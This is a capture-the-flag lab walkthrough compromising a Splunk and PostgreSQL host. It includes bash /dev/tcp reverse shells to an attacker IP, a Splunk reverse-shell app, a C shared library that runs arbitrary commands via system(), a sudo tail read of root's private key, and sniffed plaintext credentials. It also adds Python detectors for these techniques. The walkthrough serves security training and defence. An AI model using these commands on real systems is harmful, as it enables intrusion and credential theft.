Pro-Offshore-NIX01
- Initial entry point: the lab hands out a class C range
```
10.10.110.0/24
```
IP
Enumeration
Nmap host discovery (find the live hosts)
```
Nmap scan report for 10.10.110.2
Host is up (0.20s latency).
Nmap scan report for 10.10.110.3
Host is up (0.20s latency).
Nmap scan report for 10.10.110.123
Host is up (0.20s latency).
Nmap scan report for 10.10.110.124
Host is up (0.20s latency).
```
Nmap scan of 10.10.110.123
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ed:da:93:ee:2e:2b:7a:02:4d:97:3d:1b:f2:40:ba:f6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2Dy3kztjDhz66aRIvAbMvUxDtbn5qEfkE9IjRDdlK92iRXnMR0GQIadYmaLrVe8xldeuHJv1ZYT5WAR84Csrrz9zPYldtRqrYQCEHrJtjuhs2PhwWde/zQM5E3XkwEz14MaGgipLlzP6qKjhXEPuOTXLgYs3bFQR1ylJK4TO3TLR+fL5KHp8hBm0UcgyFsAIcgJ0StEEBILpi6vz9wQKkgFKkNdI0j8uh2invCc8s6dCtgySpEVt3cERsackAmSh2UCbg5dgX27U1aiXERrnKunyq0tLxK+0ZEPUa71nmLA8AO1T3KJTF+EUsqE0egS6j32jga2CR/WBeZB8nNunB
| 256 7e:de:fa:0c:9d:4c:6c:01:7c:0a:0c:f1:74:4d:f3:5f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBjQQc098ueAsYSxV4zZw0QBUmenLsuhuEH4p5QB1bhnEDcSoKgNdXSw9055D0f3U8R7jX9Key7eu1iRzY7XnSk=
| 256 15:ab:fc:b8:a2:fa:f1:57:d7:3f:bc:ab:ad:d0:cc:99 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMw1Q1IycVY7iV1vnDakUaVy3f3ICD1UBDWR0IjlxOQt
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: ACME Bank
8000/tcp open http syn-ack ttl 62 Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.110.123:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 28325D0DE04908D350C47DD30AE26CB2
|_http-server-header: Splunkd
8089/tcp open ssl/http syn-ack ttl 62 Splunkd httpd (free license; remote login disabled)
|_http-title: Site doesn't have a title (text/xml; charset=UTF-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-02-02T20:26:16
| Not valid after: 2021-02-01T20:26:16
| MD5: f181 50f9 e5a1 39a8 0d47 bcff 5a68 64ec
| SHA-1: b2d3 fdf6 fc1d b9de 2b8b 8f56 8601 b697 c962 4924
|_http-server-header: Splunkd
8191/tcp closed limnerpressure reset ttl 62
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Recon
8000/tcp
- Browsing to the Splunk web UI and opening About shows version 7.0.2
GetShell
popping-shells-on-splunk
```
https://github.com/TBGSecurity/splunk_shells
```
Upload the app package through Manage Apps, restart Splunk, then trigger the reverse connection from a search
```
| revshell std 10.10.15.74 4444
```
msfconsole exploit -j
Privilege escalation
Get a TTY shell
```
/bin/bash -c "bash -i >& /dev/tcp/10.10.15.74/443 0>&1"
python3 -c "import pty;pty.spawn('/bin/bash')"
```
netstat
```
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8089 0.0.0.0:* LISTEN 16645/splunkd
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 16645/splunkd
tcp 0 0 127.0.0.1:8065 0.0.0.0:* LISTEN 16736/python
tcp 0 0 172.16.1.23:8000 10.10.16.112:53290 TIME_WAIT -
```
A PostgreSQL database is listening on localhost, but running psql directly fails with an error
Log in to PostgreSQL locally
```
# running plain psql fails with "mark not exist"; use the full path instead
/usr/local/pgsql/bin/psql --username postgres
```
Check the database version
```
PostgreSQL 9.6.0 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.9) 5.4.0 20160609, 64-bit
```
Install postgresql-server-dev 9.6 locally and build pg_exec against it
```
https://packages.debian.org/stretch/amd64/postgresql-server-dev-9.6/download
# add to /etc/apt/sources.list
deb http://security.debian.org/debian-security stretch/updates main
wget http://security.debian.org/debian-security/pool/updates/main/p/postgresql-9.6/postgresql-server-dev-9.6_9.6.24-0+deb9u1_amd64.deb
apt install <package>
# remove every older PostgreSQL version first
sudo apt-get --purge remove postgresql
dpkg -l | grep postgres
apt-get --purge remove packagename1 packagename2 ..
```
Compile pg_exec using the headers pg_config points at
```c
// gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
#include <stdlib.h>   /* system() */
#include <string.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

PG_FUNCTION_INFO_V1(pg_exec);

/* SQL-callable wrapper: runs its cstring argument through system() and returns the exit status */
Datum pg_exec(PG_FUNCTION_ARGS) {
    char *command = PG_GETARG_CSTRING(0);
    PG_RETURN_INT32(system(command));
}
```
Connect with psql and get a shell
```
# transfer the shared object into /tmp on the target
curl http://10.10.15.74:1234/pg_exec.so -o pg_exec.so
CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;
SELECT sys('bash -c "bash -i >& /dev/tcp/10.10.15.74/4455 0>&1"');
```
Listen with nc on 4455
```
nc -lvnp 4455
```
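A defensive counterpart to the CREATE FUNCTION step above, added here and not part of the original write-up: it scans PostgreSQL statement logs for C-language functions whose shared object lives outside the server's library directories, which is exactly what loading pg_exec from /tmp looks like. It assumes log_statement is set to 'ddl' or 'all'; the log lines and the trusted-directory list are constructed for the example.

```python
import re

# Directories from which loading a C extension is expected (assumption: adjust per install)
TRUSTED_LIBDIRS = ("$libdir", "/usr/lib/postgresql/", "/usr/local/pgsql/lib/")

# Matches CREATE [OR REPLACE] FUNCTION name(...) ... AS 'object'[, 'symbol'] ... LANGUAGE C
CREATE_C_FUNC = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>\S+?)\s*\(.*?\).*?"
    r"AS\s+'(?P<obj>[^']+)'\s*(?:,\s*'(?P<sym>[^']+)')?.*?\bLANGUAGE\s+C\b",
    re.IGNORECASE | re.DOTALL,
)

def find_c_functions(log_text):
    """Return one dict per CREATE FUNCTION ... LANGUAGE C statement found in the log."""
    findings = []
    for line in log_text.splitlines():
        m = CREATE_C_FUNC.search(line)
        if not m:
            continue
        obj = m.group("obj")
        findings.append({
            "function": m.group("name"),
            "object": obj,
            "symbol": m.group("sym") or m.group("name"),   # symbol defaults to the SQL name
            "trusted_path": obj.startswith(TRUSTED_LIBDIRS),
        })
    return findings

def untrusted_loads(log_text):
    """Only the loads that point outside TRUSTED_LIBDIRS, e.g. a .so dropped in /tmp."""
    return [f for f in find_c_functions(log_text) if not f["trusted_path"]]

# Constructed sample of a postgresql.log with log_statement = 'ddl'
SAMPLE_LOG = """\
2022-12-29 10:15:01 UTC [1234] postgres@postgres LOG:  statement: SELECT version();
2022-12-29 10:15:07 UTC [1234] postgres@postgres LOG:  statement: CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;
2022-12-29 10:15:30 UTC [1290] postgres@postgres LOG:  statement: CREATE FUNCTION digest_wrap(text) RETURNS bytea AS '$libdir/pgcrypto', 'pg_digest' LANGUAGE C STRICT;
"""

if __name__ == "__main__":
    for f in untrusted_loads(SAMPLE_LOG):
        print(f"ALERT: {f['function']}() loads {f['symbol']} from untrusted object {f['object']}")
```

Restricting who holds superuser (CREATE FUNCTION ... LANGUAGE C requires it) removes the primitive entirely; the log check is the compensating detection.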
sudo -l
```
https://gtfobins.github.io/gtfobins/tail/#sudo
# use tail (allowed via sudo) to read root's id_rsa
LFILE=/root/.ssh/id_rsa
sudo tail -c1G "$LFILE"
```
id_rsa
```
-----BEGIN RSA PRIVATE KEY-----
[private key contents omitted]
-----END RSA PRIVATE KEY-----
```
Connect over SSH using the private key
```
ssh -i id_rsa root@10.10.110.123
```
FLAG
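The sudo rule abused above is a configuration finding an auditor can catch before anyone reads /root/.ssh/id_rsa. This added example (not from the original write-up) parses `sudo -l` output and flags rules that grant a root-level arbitrary file read; the binary list is an assumption built from GTFOBins-style file-read primitives, and the user and host names in the sample are placeholders.

```python
import re

# Binaries whose sudo rule lets the caller read any file as root (assumption: partial
# list of GTFOBins-style file-read primitives; extend for your environment)
FILE_READ_BINS = {"tail", "head", "cat", "less", "more", "cut", "sort", "grep",
                  "awk", "sed", "diff", "base64", "xxd", "strings", "nl", "tac"}

# One rule line of `sudo -l`, e.g. "    (root) NOPASSWD: /usr/bin/tail"
RULE_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

def parse_sudo_l(text):
    """Turn `sudo -l` output into one dict per allowed command."""
    rules = []
    for line in text.splitlines():
        m = RULE_LINE.match(line)
        if not m:
            continue   # Defaults lines, headings, blank lines
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "cmd": cmd.strip()})
    return rules

def file_read_rules(text):
    """Rules that give an arbitrary file read: ALL, or a known file-read binary."""
    risky = []
    for r in parse_sudo_l(text):
        binary = r["cmd"].split()[0].rsplit("/", 1)[-1]
        if r["cmd"] == "ALL" or binary in FILE_READ_BINS:
            risky.append(r)
    return risky

# Constructed sample; "splunk" and "nix01" are placeholder user and host names
SAMPLE_SUDO_L = """\
Matching Defaults entries for splunk on nix01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User splunk may run the following commands on nix01:
    (root) NOPASSWD: /usr/bin/tail
    (root) /usr/bin/systemctl restart splunk, /usr/bin/systemctl status splunk
"""

if __name__ == "__main__":
    for r in file_read_rules(SAMPLE_SUDO_L):
        print(f"FINDING: {r['cmd']} as ({r['runas']}), NOPASSWD={r['nopasswd']}")
```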
Post-exploitation
Capture packets with tcpdump
```
tcpdump -i eth0 -vv -w test.pcap
```
Pull the capture back to Kali with scp
```
scp -i id_rsa root@10.10.110.123:/tmp/test.pcap .
```
Open the capture in Wireshark; a set of credentials shows up in the traffic
```
admin
Zaq12wsx!
```
FLAG
- A small ping script to sweep the internal network
```bash
#!/bin/bash
# ping.sh: ping-sweep a /24 and print the hosts that answer
if [ "$1" == "" ]
then
    echo "Usage: ./ping.sh 192.168.1"
else
    for ip in $(seq 1 254); do
        ping -c 1 -w 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
    done
fi
```
https://0xbe61a55f.github.io/2022/12/29/Pro-Offshore-NIX01/